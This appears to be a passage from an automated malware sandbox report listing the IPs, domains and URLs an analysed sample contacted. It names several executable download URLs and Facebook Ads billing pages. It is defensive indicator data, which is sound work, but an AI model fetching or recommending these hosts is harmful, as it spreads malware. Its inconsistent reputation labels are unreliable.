  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.203.213
 furubujjul.net United States
13335 CLOUDFLARENETUS true
66.96.149.30
 keziheritier.com United States
29873 BIZLAND-SDUS true
176.124.192.220
 avtlsgosecure.com Russian Federation
59652 GULFSTREAMUA true
185.220.204.62
 pelegisr.com Israel
41436 CLOUDWEBMANAGE-EUGB true
140.82.121.3
 github.com United States
36459 GITHUBUS false
157.240.17.35
 star-mini.c10r.facebook.com United States
32934 FACEBOOKUS false
45.138.74.52
 unknown Russian Federation
202306 HOSTGLOBALPLUS-ASRU true
157.240.20.35
 unknown United States
32934 FACEBOOKUS false
198.23.58.153
 rukangiralawchambers.org United States
32748 STEADFASTUS true
172.67.144.83
 kkh.eiwagggg.com United States
13335 CLOUDFLARENETUS true
179.43.163.115
 unknown Panama
51852 PLI-ASCH true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
kkh.eiwagggg.com 172.67.144.83 true
star-mini.c10r.facebook.com 157.240.17.35 true
en.eredirected.xyz 198.135.55.114 true
keziheritier.com 66.96.149.30 true
jamesmillion.xyz 104.192.2.242 true
libapi.tourl.pics 100.42.65.201 true
github.com 140.82.121.3 true
furubujjul.net 172.67.203.213 true
pelegisr.com 185.220.204.62 true
avtlsgosecure.com 176.124.192.220 true
get.geojs.io 104.26.0.100 true
rukangiralawchambers.org 198.23.58.153 true
api.2ip.ua 162.0.217.254 true
en.xml-post.xyz 198.135.55.114 true
aaa.apiaaaeg.com 45.136.151.102 true
www.facebook.com unknown unknown
www.rukangiralawchambers.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing false
    		high
    http://avtlsgosecure.com/ false
    • URL Reputation: safe
    		 unknown
    https://keziheritier.com/jamesp.exe false
    • Avira URL Cloud: safe
    		 unknown
    https://kkh.eiwagggg.com/files/pe/pb1113.exe true
    • Avira URL Cloud: safe
    		 unknown
    https://keziheritier.com/7.exe false
    • Avira URL Cloud: safe
    		 unknown
    http://nuluitnulo.me/ true
    • URL Reputation: safe
    		 unknown
    http://winnlinne.com/lancer/get.php true
    • URL Reputation: safe
    		 unknown
    http://bururutu44org.org/ true
    • URL Reputation: safe
    		 unknown
    http://nvulukuluir.net/ true
    • URL Reputation: safe
    		 unknown
    http://liubertiyyyul.net/ true
    • URL Reputation: safe
    		 unknown
    http://furubujjul.net/ true
    • URL Reputation: safe
    		 unknown
    http://youyouumenia5.org/ true
    • URL Reputation: safe
    		 unknown
    http://guluiiiimnstra.net/ true
    • URL Reputation: safe
    		 unknown
    http://45.138.74.52/s.exe true
    • Avira URL Cloud: safe
    		 unknown
    https://www.facebook.com/ads/manager/account_settings/account_billing false
      		high
      https://pelegisr.com/upload/ChromeSetup.exe false
      • Avira URL Cloud: safe
      		 unknown
      https://www.rukangiralawchambers.org/22.exe false
      • URL Reputation: safe
      		 unknown
      http://179.43.163.115/intersock.exe true
      • URL Reputation: safe
      		 unknown